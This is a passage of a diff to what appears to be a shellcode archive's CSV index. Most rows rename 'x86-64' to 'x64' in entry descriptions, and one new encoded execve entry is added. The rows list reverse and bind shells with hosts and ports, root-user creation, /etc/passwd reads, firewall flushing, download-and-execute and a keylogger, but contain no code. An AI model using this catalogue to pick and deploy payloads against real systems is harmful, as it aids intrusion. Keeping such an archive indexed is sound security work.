Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 -40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 +40029,shellcodes/linux_x86-64/40029.c,"Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64 +40052,shellcodes/linux_x86-64/40052.c,"Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64 40056,shellcodes/linux_x86/40056.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)",2016-07-04,sajith,shellcode,linux_x86 -40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 +40061,shellcodes/linux_x86-64/40061.c,"Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64 40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86 -40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 +40079,shellcodes/linux_x86-64/40079.c,"Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64 40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86 -40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 +40122,shellcodes/linux_x86-64/40122.c,"Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32 40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86 -40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 +40139,shellcodes/linux_x86-64/40139.c,"Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64 40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86 40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86 40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86 -40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA() Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86 40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86 -43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64 -43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 -43568,shellcodes/linux_x86-64/43568.asm,"Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 -43570,shellcodes/linux_x86-64/43570.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 -43597,shellcodes/linux_x86-64/43597.c,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64 -43598,shellcodes/linux_x86-64/43598.c,"Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43599,shellcodes/linux_x86-64/43599.c,"Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 -43601,shellcodes/linux_x86-64/43601.asm,"Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 -43602,shellcodes/linux_x86-64/43602.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 -43603,shellcodes/linux_x86-64/43603.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 -43604,shellcodes/linux_x86-64/43604.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 -43605,shellcodes/linux_x86-64/43605.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 -43606,shellcodes/linux_x86-64/43606.c,"Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 -43607,shellcodes/linux_x86-64/43607.c,"Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64 +43562,shellcodes/linux_x86-64/43562.c,"Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43563,shellcodes/linux_x86-64/43563.c,"Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43564,shellcodes/linux_x86-64/43564.c,"Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43565,shellcodes/linux_x86-64/43565.asm,"Linux/x64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64 +43566,shellcodes/linux_x86-64/43566.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64 +43568,shellcodes/linux_x86-64/43568.asm,"Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43570,shellcodes/linux_x86-64/43570.asm,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)",2009-01-01,"Andriy Brukhovetskyy",shellcode,linux_x86-64 +43597,shellcodes/linux_x86-64/43597.c,"Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes)",2009-01-01,"Geyslan G. Bem",shellcode,linux_x86-64 +43598,shellcodes/linux_x86-64/43598.c,"Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43599,shellcodes/linux_x86-64/43599.c,"Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)",2012-10-04,"Russell Willis",shellcode,linux_x86-64 +43601,shellcodes/linux_x86-64/43601.asm,"Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43602,shellcodes/linux_x86-64/43602.asm,"Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)",2009-01-01,Gaussillusion,shellcode,linux_x86-64 +43603,shellcodes/linux_x86-64/43603.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 +43604,shellcodes/linux_x86-64/43604.c,"Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 +43605,shellcodes/linux_x86-64/43605.c,"Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 +43606,shellcodes/linux_x86-64/43606.c,"Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)",2009-01-01,egeektronic,shellcode,linux_x86-64 +43607,shellcodes/linux_x86-64/43607.c,"Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes)",2009-01-01,zbt,shellcode,linux_x86-64 43608,shellcodes/openbsd_x86/43608.c,"OpenBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,beosroot,shellcode,openbsd_x86 43610,shellcodes/osx_ppc/43610.c,"OSX/PPC - Remote findsock by recv() Key Shellcode",2009-01-01,"Dino Dai Zovi",shellcode,osx_ppc 43611,shellcodes/osx_ppc/43611.asm,"OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode",2009-01-01,"H D Moore",shellcode,osx_ppc @@ -755,34 +755,35 @@ id,file,description,date,author,type,platform 43773,shellcodes/windows_x86/43773.c,"Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes)",2010-07-10,"John Leitch",shellcode,windows_x86 43774,shellcodes/windows_x86/43774.c,"Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes)",2009-01-01,d3c0der,shellcode,windows_x86 43778,shellcodes/arm/43778.asm,"Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)",2018-01-15,rtmcx,shellcode,arm -40549,shellcodes/windows_x86-64/40549.c,"Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +43890,shellcodes/linux_x86/43890.c,"Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes)",2018-01-23,"Hashim Jawad",shellcode,linux_x86 +40549,shellcodes/windows_x86-64/40549.c,"Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40560,shellcodes/windows_x86/40560.asm,"Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 -40781,shellcodes/windows_x86-64/40781.c,"Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 -40821,shellcodes/windows_x86-64/40821.c,"Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40781,shellcodes/windows_x86-64/40781.c,"Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40808,shellcodes/linux_x86-64/40808.c,"Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 +40821,shellcodes/windows_x86-64/40821.c,"Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 -40981,shellcodes/windows_x86-64/40981.c,"Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -41072,shellcodes/windows_x86-64/41072.c,"Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 -41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 -41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 +40981,shellcodes/windows_x86-64/40981.c,"Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +41072,shellcodes/windows_x86-64/41072.c,"Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +41089,shellcodes/linux_x86-64/41089.c,"Linux/x64 - mkdir() Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 +41128,shellcodes/linux_x86-64/41128.c,"Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 +41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux 41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator 41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86 41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux 41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86 -41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64 +41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64 41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86 -41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64 +41439,shellcodes/linux_x86-64/41439.c,"Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64 41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86 -41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 -41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 +41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 +41477,shellcodes/linux_x86-64/41477.c,"Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86 -41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 -41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 -41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 -41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 +41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 +41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86 43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86 43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86 @@ -792,8 +793,8 @@ id,file,description,date,author,type,platform 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86 43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86 43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm -43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 -43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 +43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 +43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86 43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86 43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 @@ -817,46 +818,46 @@ id,file,description,date,author,type,platform 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4 43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4 43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc -43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 -43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 -43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 -43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 -43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 -43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 -43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 -43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 +43549,shellcodes/linux_x86-64/43549.c,"Linux/x64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64 +43550,shellcodes/linux_x86-64/43550.c,"Linux/x64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43551,shellcodes/linux_x86-64/43551.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43552,shellcodes/linux_x86-64/43552.c,"Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43553,shellcodes/linux_x86-64/43553.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43554,shellcodes/linux_x86-64/43554.c,"Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 +43555,shellcodes/linux_x86-64/43555.c,"Linux/x64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 +43556,shellcodes/linux_x86-64/43556.asm,"Linux/x64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 +43557,shellcodes/linux_x86-64/43557.asm,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 